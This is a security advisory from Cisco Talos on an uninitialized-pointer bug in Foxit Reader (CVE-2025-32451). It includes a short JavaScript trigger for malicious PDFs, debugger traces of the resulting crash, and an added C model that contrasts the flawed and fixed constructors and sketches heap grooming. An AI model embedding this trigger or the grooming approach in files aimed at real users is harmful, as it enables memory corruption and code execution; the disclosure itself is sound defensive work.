Talos Vulnerability Report

TALOS-2025-2202

Foxit Reader Signature Uninitialized Pointer Vulnerability

August 13, 2025
CVE Number

CVE-2025-32451

SUMMARY

A memory corruption vulnerability exists in Foxit Reader 2025.1.0.27937 due to the use of an uninitialized pointer. Specially crafted JavaScript code inside a malicious PDF document can trigger this vulnerability, which can lead to memory corruption and result in arbitrary code execution. An attacker needs to trick the user into opening the malicious file to trigger this vulnerability. Exploitation is also possible if a user visits a specially crafted, malicious site while the browser plugin extension is enabled.

CONFIRMED VULNERABLE VERSIONS

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Foxit Reader 2025.1.0.27937

PRODUCT URLS

Foxit Reader - https://www.foxitsoftware.com/pdf-reader/

CVSSv3 SCORE

8.8 - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CWE

CWE-824 - Access of Uninitialized Pointer

DETAILS

Foxit PDF Reader is one of the most popular PDF document readers. It aims for feature parity with Adobe’s Acrobat Reader. As a complete and feature-rich PDF reader, it supports JavaScript for interactive documents and dynamic forms. JavaScript support poses an additional attack surface. Foxit Reader uses the V8 JavaScript engine.

JavaScript support in PDF renderers and editors enables dynamic documents that can change based on user input or events. There exists an uninitialized pointer vulnerability in the way Foxit Reader handles a signature object. This can be illustrated by the following proof-of-concept code:

function main() {
    // Fetch the signature information object of the "Signature_0" signature field.
    sig_info = app.activeDocs[0].getField("Signature_0").signatureInfo();
    // Lock the same field after its signature info has been retrieved.
    app.activeDocs[0].getField("Signature_0").setLock(true);
    // Serialize the previously retrieved object, which reaches the uninitialized field.
    JSON.stringify(sig_info);
}

The above JavaScript code causes the creation of a CPDF_Signature object in which one field is never initialized. Later, this uninitialized pointer field is read and used without any validation. This behavior can be observed in the debugger with PageHeap enabled, which fills freshly allocated heap memory with the 0xE0 byte pattern, so any field still showing e0e0e0e0 has not been written since allocation:

0:000> p
eax=07fce468 ebx=07fce600 ecx=00000000 edx=176e9708 esi=1598c788 edi=00000000
eip=01ca51a3 esp=07fce45c ebp=07fce474 iopl=0         nv up ei ng nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200282
FoxitPDFReader!safe_vsnprintf+0x648e3:
01ca51a3 6884000000      push    84h                               ;<-------------- (1)
0:000> p
eax=07fce468 ebx=07fce600 ecx=00000000 edx=176e9708 esi=1598c788 edi=00000000
eip=01ca51a8 esp=07fce45c ebp=07fce474 iopl=0         nv up ei ng nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200282
FoxitPDFReader!safe_vsnprintf+0x648e8:
01ca51a8 e883845000      call    FoxitPDFReader!safe_vsnprintf+0x56cd70 (021ad630)  ;<-------------- (2)
0:000> p
eax=120069e0 ebx=07fce600 ecx=28e21ca9 edx=00000002 esi=1598c788 edi=00000000
eip=01ca51ad esp=07fce45c ebp=07fce474 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200246
FoxitPDFReader!safe_vsnprintf+0x648ed:
01ca51ad 83c404          add     esp,4  
0:000> dd eax                                                ;<-------------- (3)
120069e0  e0e0e0e0 e0e0e0e0 e0e0e0e0 e0e0e0e0
120069f0  e0e0e0e0 e0e0e0e0 e0e0e0e0 e0e0e0e0
12006a00  e0e0e0e0 e0e0e0e0 e0e0e0e0 e0e0e0e0
12006a10  e0e0e0e0 e0e0e0e0 e0e0e0e0 e0e0e0e0
12006a20  e0e0e0e0 e0e0e0e0 e0e0e0e0 e0e0e0e0
12006a30  e0e0e0e0 e0e0e0e0 e0e0e0e0 e0e0e0e0
12006a40  e0e0e0e0 e0e0e0e0 e0e0e0e0 e0e0e0e0
12006a50  e0e0e0e0 e0e0e0e0 e0e0e0e0 e0e0e0e0
0:000> p
eax=120069e0 ebx=07fce600 ecx=28e21ca9 edx=00000002 esi=1598c788 edi=00000000
eip=01ca51b0 esp=07fce460 ebp=07fce474 iopl=0         nv up ei pl nz ac pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200216
FoxitPDFReader!safe_vsnprintf+0x648f0:
01ca51b0 8945f0          mov     dword ptr [ebp-10h],eax ss:002b:07fce464=00000000
0:000> pc
eax=120069e0 ebx=07fce600 ecx=120069e0 edx=00000002 esi=1598c788 edi=00000000
eip=01ca51d2 esp=07fce458 ebp=07fce474 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200246
FoxitPDFReader!safe_vsnprintf+0x64912:
01ca51d2 e8d9bbe200      call    FoxitPDFReader!safe_vsnprintf+0xe904f0 (02ad0db0)  ;<-------------- (4)
0:000> dd 120069e0                                         ;<-------------- (5)
120069e0  e0e0e0e0 e0e0e0e0 e0e0e0e0 e0e0e0e0
120069f0  e0e0e0e0 e0e0e0e0 e0e0e0e0 e0e0e0e0
12006a00  e0e0e0e0 e0e0e0e0 e0e0e0e0 e0e0e0e0
12006a10  e0e0e0e0 e0e0e0e0 e0e0e0e0 e0e0e0e0
12006a20  e0e0e0e0 e0e0e0e0 e0e0e0e0 e0e0e0e0
12006a30  e0e0e0e0 e0e0e0e0 e0e0e0e0 e0e0e0e0
12006a40  e0e0e0e0 e0e0e0e0 e0e0e0e0 e0e0e0e0
12006a50  e0e0e0e0 e0e0e0e0 e0e0e0e0 e0e0e0e0
0:000> p
eax=120069e0 ebx=07fce600 ecx=cf654049 edx=00000009 esi=1598c788 edi=00000000
eip=01ca51d7 esp=07fce460 ebp=07fce474 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200246
FoxitPDFReader!safe_vsnprintf+0x64917:
01ca51d7 c745fcffffffff  mov     dword ptr [ebp-4],0FFFFFFFFh ss:002b:07fce470=00000000 ;<-------------- (6)
0:000> dd 120069e0
120069e0  058f5eac 00000000 176e9708 e0e0e0e0
120069f0  00007c18 00000000 15891b60 00000000
12006a00  00000000 00000000 00000000 00000000
12006a10  00000004 00000000 00000000 00000001
12006a20  00000000 00000000 00000000 00000000
12006a30  00000000 00000000 e0e0e000 00000000
12006a40  00000000 00000000 00000000 00000000
12006a50  00000000 00000000 00000000 00000000

At (1), the allocation size (0x84 bytes) is pushed, and the method called at (2) eventually invokes malloc to allocate the object. The fresh buffer is examined at (3): it contains only the PageHeap fill pattern, so nothing has been written to it yet. Next, at (4), the buffer is passed as the `this` pointer to a method (the constructor) without any prior initialization; the dump at (5) confirms it is still untouched at that point. After the method returns, the dump following (6) shows that most of the object has been populated, but the field at offset 0x0C (address 120069ec) still holds e0e0e0e0: it was never initialized.

0:000> p
eax=e0e0e0e0 ebx=15a19440 ecx=120069e0 edx=10df4c18 esi=00000000 edi=1597aad0
eip=02ad6bb2 esp=07fce450 ebp=07fce4a0 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200202
FoxitPDFReader!safe_vsnprintf+0xe962f2:
02ad6bb2 c745cc08000000  mov     dword ptr [ebp-34h],8 ss:002b:07fce46c=00000001
0:000> p
eax=e0e0e0e0 ebx=15a19440 ecx=120069e0 edx=10df4c18 esi=00000000 edi=1597aad0
eip=02ad6bb9 esp=07fce450 ebp=07fce4a0 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200202
FoxitPDFReader!safe_vsnprintf+0xe962f9:
02ad6bb9 7454            je      FoxitPDFReader!safe_vsnprintf+0xe9634f (02ad6c0f) [br=0]
0:000> p
eax=e0e0e0e0 ebx=15a19440 ecx=120069e0 edx=10df4c18 esi=00000000 edi=1597aad0
eip=02ad6bbb esp=07fce450 ebp=07fce4a0 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200202
FoxitPDFReader!safe_vsnprintf+0xe962fb:
02ad6bbb 8d45c8          lea     eax,[ebp-38h]
0:000> p
eax=07fce468 ebx=15a19440 ecx=120069e0 edx=10df4c18 esi=00000000 edi=1597aad0
eip=02ad6bbe esp=07fce450 ebp=07fce4a0 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200202
FoxitPDFReader!safe_vsnprintf+0xe962fe:
02ad6bbe c7433401000100  mov     dword ptr [ebx+34h],10001h ds:002b:15a19474=00000000
0:000> p
eax=07fce468 ebx=15a19440 ecx=120069e0 edx=10df4c18 esi=00000000 edi=1597aad0
eip=02ad6bc5 esp=07fce450 ebp=07fce4a0 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200202
FoxitPDFReader!safe_vsnprintf+0xe96305:
02ad6bc5 8b490c          mov     ecx,dword ptr [ecx+0Ch] ds:002b:120069ec=e0e0e0e0 ; <----------- (7)
0:000> p
eax=07fce468 ebx=15a19440 ecx=e0e0e0e0 edx=10df4c18 esi=00000000 edi=1597aad0
eip=02ad6bc8 esp=07fce450 ebp=07fce4a0 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200202
FoxitPDFReader!safe_vsnprintf+0xe96308:
02ad6bc8 50              push    eax
0:000> p
eax=07fce468 ebx=15a19440 ecx=e0e0e0e0 edx=10df4c18 esi=00000000 edi=1597aad0
eip=02ad6bc9 esp=07fce44c ebp=07fce4a0 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200202
FoxitPDFReader!safe_vsnprintf+0xe96309:
02ad6bc9 e8421b34ff      call    FoxitPDFReader!safe_vsnprintf+0x1d7e50 (01e18710) ; <----------- (8)

Later, the uninitialized field is loaded at (7) and passed as the `this` pointer to the method called at (8). That method reads memory relative to the uninitialized pointer (here 0xe0e0e0e0, the fill pattern, so the access lands on an unmapped page), and the following access violation occurs:

0:000> p
(b90.e8): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=e209bf3a ebx=15a19440 ecx=00000073 edx=00000000 esi=e0e0e0f0 edi=07fce468
eip=021b8e62 esp=07fce414 ebp=07fce41c iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00210246
FoxitPDFReader!safe_vsnprintf+0x5785a2:
021b8e62 f77608          div     eax,dword ptr [esi+8] ds:002b:e0e0e0f8=????????
0:000> u
FoxitPDFReader!safe_vsnprintf+0x5785a2:
021b8e62 f77608          div     eax,dword ptr [esi+8]
021b8e65 8b450c          mov     eax,dword ptr [ebp+0Ch]
021b8e68 8910            mov     dword ptr [eax],edx
021b8e6a 8b7604          mov     esi,dword ptr [esi+4]
021b8e6d 85f6            test    esi,esi
021b8e6f 7422            je      FoxitPDFReader!safe_vsnprintf+0x5785d3 (021b8e93)
021b8e71 8b3496          mov     esi,dword ptr [esi+edx*4]
021b8e74 85f6            test    esi,esi
0:000> kb
 # ChildEBP RetAddr      Args to Child              
WARNING: Stack unwind information not available. Following frames may be wrong.
00 07fce41c 021b9460     07fce468 07fce42c e0e0e0f0 FoxitPDFReader!safe_vsnprintf+0x5785a2
01 07fce430 01e18723     07fce468 07fce440 e0e0e0e0 FoxitPDFReader!safe_vsnprintf+0x578ba0
02 07fce444 02ad6bce     07fce468 cf6540b9 1597aad0 FoxitPDFReader!safe_vsnprintf+0x1d7e63
03 07fce4a0 01caa57b     07fce6c0 6b5b440c 15a19440 FoxitPDFReader!safe_vsnprintf+0xe9630e
04 07fce4a8 6b5b440c     15a19440 96964da9 07fce7c8 FoxitPDFReader!safe_vsnprintf+0x69cbb
05 07fce6c0 6b5b5335     00000000 07fce73c 6b5b5335 Signature!PlugInMain+0x9b29c
06 07fce730 6b51e3fd     1598c788 07fce8c8 6b51e3fd Signature!PlugInMain+0x9c1c5
07 07fce83c 6b4e890a     177727e4 07fce8c8 969643e1 Signature!PlugInMain+0x528d
08 07fce888 0126bd6c     1247c2d8 176e9708 07fce8c8 Signature!AUILib::HyperLinkElement::~HyperLinkElement+0x2e46a
09 07fce8c0 02fb5750     15306b28 176e9708 07fce90c FoxitPDFReader!CryptUIWizExport+0x32ecc
0a 07fce8fc 02f9fb8b     1226e458 07fce91c 153060e0 FoxitPDFReader!safe_vsnprintf+0x1374e90
0b 07fce948 03286273     12273db8 07fce98c 1226e458 FoxitPDFReader!safe_vsnprintf+0x135f2cb
0c 07fce9a4 032ff3c3     14e07658 13036000 07fceac8 FoxitPDFReader!FXJSE_GetClass+0x4b3
0d 07fcea74 032feef0     07fceab4 07fceac8 14e073f0 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x78b53
0e 07fceaa8 0344a76d     07fceb0c 00fceac8 00000000 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x78680
0f 07fceb24 03446436     07fcf65c 07fcedd0 07fcec8c FoxitPDFReader!CFXJSE_Arguments::GetValue+0x1c3efd
10 07fcec4c 0344ab80     07fcf65c 00000000 13036154 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x1bfbc6
11 07fcec6c 03449470     07fcf5fc 07fcf65c 07fcf660 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x1c4310
12 07fcf5d4 03526436     07fcf5fc 13036000 07fcf65c FoxitPDFReader!CFXJSE_Arguments::GetValue+0x1c2c00
13 07fcf604 03526beb     07fcf61c 00000008 07fcf664 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x29fbc6
14 07fcf620 0374e781     00000008 07fcf664 13036000 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x2a037b
15 07fcf640 036c5895     18b80039 226d4849 00000010 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x4c7f11
16 07fcf690 036c5895     226d23e9 226ec095 18b80039 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x43f025
17 07fcf6bc 036c382d     226d23e9 18b80745 226ec1f9 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x43f025
18 07fcf6d4 036c3653     00000000 00000000 00000002 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x43cfbd
19 07fcf708 032c789e     13036080 18b80039 226ec1f9 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x43cde3
1a 07fcf79c 032c746c     07fcf89c 13036000 07fcf7f4 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x4102e
1b 07fcf81c 032ad9fb     07fcf89c 13036000 14e07358 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x40bfc
1c 07fcf8c4 032ad750     07fcf960 14e07370 00000000 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x2718b
1d 07fcf8d8 032843f9     07fcf960 14e07370 cf655d49 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x26ee0
1e 07fcf950 03284da6     14e07358 17707f50 14e07340 FoxitPDFReader!FXJSE_Runtime_Release+0xff9
1f 07fcf98c 02ddd1a6     11d93098 116aabf4 17707f50 FoxitPDFReader!FXJSE_ExecuteScript+0x86
20 07fcf9f8 02dde0d0     00000000 07fcfa70 07fcfa3c FoxitPDFReader!safe_vsnprintf+0x119c8e6
21 07fcfa0c 02f38995     07fcfa70 07fcfa3c cf655e2d FoxitPDFReader!safe_vsnprintf+0x119d810
22 07fcfa34 02f38a9c     00000000 07fcfa70 cf655e71 FoxitPDFReader!safe_vsnprintf+0x12f80d5
23 07fcfa68 02de03d0     1776aed0 00000113 07fcfa8c FoxitPDFReader!safe_vsnprintf+0x12f81dc
24 07fcfa78 0124fbf7     00000113 0000593a 055c3ce8 FoxitPDFReader!safe_vsnprintf+0x119fb10
25 07fcfa8c 75a4171b     00000000 00000113 0000593a FoxitPDFReader!CryptUIWizExport+0x16d57
26 07fcfab8 75a34274     0124fbe0 00000000 00000113 USER32!_InternalCallWinProc+0x2b
27 07fcfb88 75a364fb     0124fbe0 00000000 00000113 USER32!UserCallWinProc+0x143
28 07fcfbfc 75a362e0     00000013 07fcfc24 00b46120 USER32!DispatchMessageWorker+0x20b
29 07fcfc08 00b46120     0d1c9118 0d1c9118 0649e830 USER32!DispatchMessageW+0x10
2a 07fcfc24 00b461d3     0649e830 00b46140 ffffffff FoxitPDFReader!AUILib::SkinManagerColor::operator!=+0x1c3890
2b 07fcfc44 04d0cdaa     00000000 00000001 080e4000 FoxitPDFReader!AUILib::SkinManagerColor::operator!=+0x1c3943
2c 07fcfc5c 04abae48     00770000 00000000 0d165144 FoxitPDFReader!AUILib::SkinManagerColor::SetDefaultColor+0xa04d8a
2d 07fcfca8 750bfcc9     080e4000 750bfcb0 07fcfd14 FoxitPDFReader!AUILib::SkinManagerColor::SetDefaultColor+0x7b2e28
2e 07fcfcb8 7728809e     080e4000 1c99cca1 00000000 KERNEL32!BaseThreadInitThunk+0x19
2f 07fcfd14 7728806e     ffffffff 772a911e 00000000 ntdll!__RtlUserThreadStart+0x2f
30 07fcfd24 00000000     04abaf23 080e4000 00000000 ntdll!_RtlUserThreadStart+0x1b

By carefully controlling the allocations and deallocations that happen before the vulnerability is triggered, an attacker could place controlled data in the heap chunk that the uninitialized field inherits, which can lead to further memory corruption and potentially arbitrary code execution.
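The following C program is an added example and is not Foxit's code; it models the pattern described in the debugger walkthrough above (an object whose constructor skips one pointer field, and a callee that divides by a count at +8 of that pointer and indexes a bucket array at +4, as at the `div eax,[esi+8]` crash site) and the heap-grooming idea of the previous paragraph. The struct names and layouts, the `sig_lookup` structure, the bucket lookup and the 0x41 spray byte are all assumptions made for illustration; whether the groomed chunk is actually reused depends on the allocator (glibc's tcache returns it immediately). The vulnerable constructor is shown beside a fixed one that zero-initializes the object and validates the pointer before use.

```c
/* Added example, not Foxit's code: a C model of the CWE-824 pattern in this advisory.
 * Layouts, names and the bucket lookup are assumptions mirroring the debugger output.
 * Build: cc -std=c11 -Wall -o uninit_ptr uninit_ptr.c && ./uninit_ptr */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define SPRAY_BYTE 0x41  /* marker written by the heap-grooming demo below */

/* Hypothetical structure reached through the uninitialized field. */
struct sig_lookup {
    uint32_t  reserved;      /* +0x00 */
    void    **buckets;       /* +0x04 on the 32-bit build: bucket array */
    uint32_t  bucket_count;  /* +0x08: the divisor at the crash site */
};

/* Hypothetical CPDF_Signature-like object, 0x84 bytes on the 32-bit build. */
struct sig_object {
    void              *vtable;   /* +0x00, written by the constructor */
    uint32_t           state;    /* +0x04, written by the constructor */
    void              *doc;      /* +0x08, written by the constructor */
    struct sig_lookup *lookup;   /* +0x0C, the field the vulnerable constructor skips */
    uint8_t            rest[0x74];
};

static int vtable_stub;  /* stand-in for a real vtable */

/* Vulnerable shape: malloc() plus partial initialization. The lookup field keeps
 * whatever the heap chunk held before (PageHeap showed 0xE0E0E0E0 in the advisory). */
static struct sig_object *sig_object_create_vulnerable(void *doc) {
    struct sig_object *o = malloc(sizeof *o);
    if (o == NULL) return NULL;
    o->vtable = &vtable_stub;
    o->state  = 0;
    o->doc    = doc;
    /* o->lookup is never written */
    return o;
}

/* Fixed shape: zero the whole object so every pointer starts as NULL, and still set
 * the field explicitly so the intent survives a later change of allocator. */
static struct sig_object *sig_object_create_fixed(void *doc) {
    struct sig_object *o = calloc(1, sizeof *o);
    if (o == NULL) return NULL;
    o->vtable = &vtable_stub;
    o->state  = 0;
    o->doc    = doc;
    o->lookup = NULL;
    return o;
}

/* Models the callee reached at (8): index = hash % bucket_count, then read the bucket.
 * Returns 0 on success, -1 when there is no usable table; these checks are what the
 * crashing path lacks. */
static int sig_object_find(const struct sig_object *o, uint32_t hash, void **out) {
    const struct sig_lookup *t = o->lookup;
    if (t == NULL || t->buckets == NULL || t->bucket_count == 0) return -1;
    *out = t->buckets[hash % t->bucket_count];
    return 0;
}

/* Heap grooming: free an attacker-shaped chunk of the object's size right before the
 * object is created, so the allocator may hand that chunk back and the uninitialized
 * field inherits SPRAY_BYTE. Returns 1 if it did, 0 otherwise (allocator dependent).
 * The stale value is only inspected byte by byte, never dereferenced. */
static int groom_and_inspect(void) {
    unsigned char *spray = malloc(sizeof(struct sig_object));
    if (spray == NULL) return 0;
    memset(spray, SPRAY_BYTE, sizeof(struct sig_object));
    free(spray);

    struct sig_object *o = sig_object_create_vulnerable(NULL);
    if (o == NULL) return 0;
    unsigned char stale[sizeof o->lookup];
    memcpy(stale, &o->lookup, sizeof stale);
    int controlled = 1;
    for (size_t i = 0; i < sizeof stale; i++)
        if (stale[i] != SPRAY_BYTE) controlled = 0;
    free(o);
    return controlled;
}

/* Fixed object: the lookup is refused while the field is NULL and works once a table
 * is attached (0x1234 % 4 == 0 selects buckets[0]). Returns 1 on success. */
static int fixed_path_ok(void) {
    static int values[4] = { 10, 20, 30, 40 };
    void *buckets[4] = { &values[0], &values[1], &values[2], &values[3] };
    struct sig_lookup table = { 0, buckets, 4 };
    struct sig_object *o = sig_object_create_fixed(NULL);
    if (o == NULL) return 0;
    void *hit = NULL;
    int refused = sig_object_find(o, 0x1234, &hit);  /* -1: no table yet, no crash */
    o->lookup = &table;
    int found = sig_object_find(o, 0x1234, &hit);    /* 0: buckets[0] */
    free(o);
    return refused == -1 && found == 0 && hit == buckets[0];
}

int main(void) {
    printf("fixed constructor path behaves: %s\n", fixed_path_ok() ? "yes" : "no");
    printf("groomed chunk reused by vulnerable object: %s\n",
           groom_and_inspect() ? "yes, field now holds attacker bytes" : "no");
    return 0;
}
```

Running it under AddressSanitizer or MemorySanitizer is the practical check: MSan reports the read of `o->lookup` in the vulnerable path as a use of uninitialized memory, while the fixed constructor produces no report, which is the same signal PageHeap's fill pattern gave in the debugger session above.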

TIMELINE

2025-06-02 - Vendor Disclosure
2025-08-13 - Vendor Patch Release
2025-08-13 - Public Release

Credit

Discovered by KPC of Cisco Talos.